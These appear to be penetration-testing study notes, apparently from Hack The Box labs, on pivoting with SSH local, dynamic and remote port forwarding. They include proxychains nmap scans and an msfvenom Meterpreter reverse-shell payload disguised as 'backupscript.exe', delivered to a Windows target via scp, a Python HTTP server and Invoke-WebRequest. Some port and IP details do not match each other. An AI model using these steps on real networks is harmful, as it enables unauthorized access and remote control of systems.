Shelled

Pivoting

Port Forwarding

Local Port Forward

Description

Enables us to simulate a remote service by sending traffic on a local port (33306) to a remote port (3306) over SSH.

Step 1

We cannot access the MySQL server on the Target Host.


    Shelled@htb[/htb]$ nmap -sT -p22,3306 10.129.202.64

    Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-24 12:12 EST
    Nmap scan report for 10.129.202.64
    Host is up (0.12s latency).
    
    PORT     STATE  SERVICE
    22/tcp   open   ssh
    3306/tcp closed mysql
    
    Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds

Step 2

To access the MySQL service, we can either SSH into the server and access MySQL from inside the Target Host, or we can port forward it to our localhost on port `33306` and access it locally.

Shelled@htb[/htb]$ ssh -L 33306:localhost:3306 Target@10.129.202.64

The `-L` command tells the SSH client to request the SSH server to forward all the data we send via the port `33306` to `localhost:3306` on the Target Host.

Note

Dynamic Port Forwarding

Description

Enables us to simulate a remote host locally by sending traffic on a local port (4444) to a remote host over SSH.

Step 0

We have RCE on Target Host (10.10.15.6). This is the Target Host's Network Interface Information.


    ubuntu@WEB01:~$ ifconfig 

    ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 10.10.202.64  netmask 255.255.0.0  broadcast 10.129.255.255
            inet6 dead:beef::250:56ff:feb9:52eb  prefixlen 64  scopeid 0x0<global>
            inet6 fe80::250:56ff:feb9:52eb  prefixlen 64  scopeid 0x20<link>
            ether 00:50:56:b9:52:eb  txqueuelen 1000  (Ethernet)
            RX packets 35571  bytes 177919049 (177.9 MB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 10452  bytes 1474767 (1.4 MB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

    ens224: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 172.16.5.129  netmask 255.255.254.0  broadcast 172.16.5.255
            inet6 fe80::250:56ff:feb9:a9aa  prefixlen 64  scopeid 0x20<link>
            ether 00:50:56:b9:a9:aa  txqueuelen 1000  (Ethernet)
            RX packets 8251  bytes 1125190 (1.1 MB)
            RX errors 0  dropped 40  overruns 0  frame 0
            TX packets 1538  bytes 123584 (123.5 KB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            inet6 ::1  prefixlen 128  scopeid 0x10<host>
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 270  bytes 22432 (22.4 KB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 270  bytes 22432 (22.4 KB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Step 1

We want to do an nmap scan on (172.16.5.129). To do this we need to start an SSH server with dynamic port forwarding enabled.

Shelled@htb[/htb]$ ssh -D 4444 ubuntu@10.129.202.64

Step 2

To inform proxychains that we must use port 9050, we must modify the proxychains configuration file located at `/etc/proxychains.conf`. We can add `socks4 127.0.0.1 4444` to the last line if it is not already there.


    Shelled@htb[/htb]$ tail -4 /etc/proxychains.conf

    # meanwile
    # defaults set to "tor"
    socks4 	127.0.0.1 4444

Step 3


    Shelled@htb[/htb]$ proxychains nmap -v -sn 172.16.5.1-200

    ProxyChains-3.1 (http://proxychains.sf.net)
    
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-24 12:30 EST
    Initiating Ping Scan at 12:30
    Scanning 10 hosts [2 ports/host]
    |S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.2:80-<--timeout
    |S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.5:80-<><>-OK
    |S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.6:80-<--timeout
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    
    <SNIP>

Note

Remote Port Forwarding

Description

Enables us to simulate a 2 layer deep remote host locally by sending traffic on local port (4444) to the Pivot Host which will send that traffic to the Target Host.

Step 1

Create reverse shell payload that will be executed on Target Host.

Shelled@htb[/htb]$ msfvenom -p windows/x64/meterpreter/reverse_https lhost=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8888

Step 2

Listen on Attack Host for reverse shell

msf6 > use exploit/multi/handler

Step 3

Transfer payload from Attack Host to Pivot Host

Shelled@htb[/htb]$ scp backupscript.exe ubuntu@<ipAddressofTarget>:~/

Step 4

Transfer payload from Pivot Host to Target Host (1)

ubuntu@Webserver$ python3 -m http.server 8123

Step 5

Transfer payload from Pivot Host to Target Host (2)

PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

Step 6

Pivot Host will listen on port 8888 and forward all incoming connections to port 4444 on Attack Host.

Shelled@htb[/htb]$ ssh -R <InternalIPofPivotHost>:8888:0.0.0.0:4444 ubuntu@<ipAddressofTarget> -vN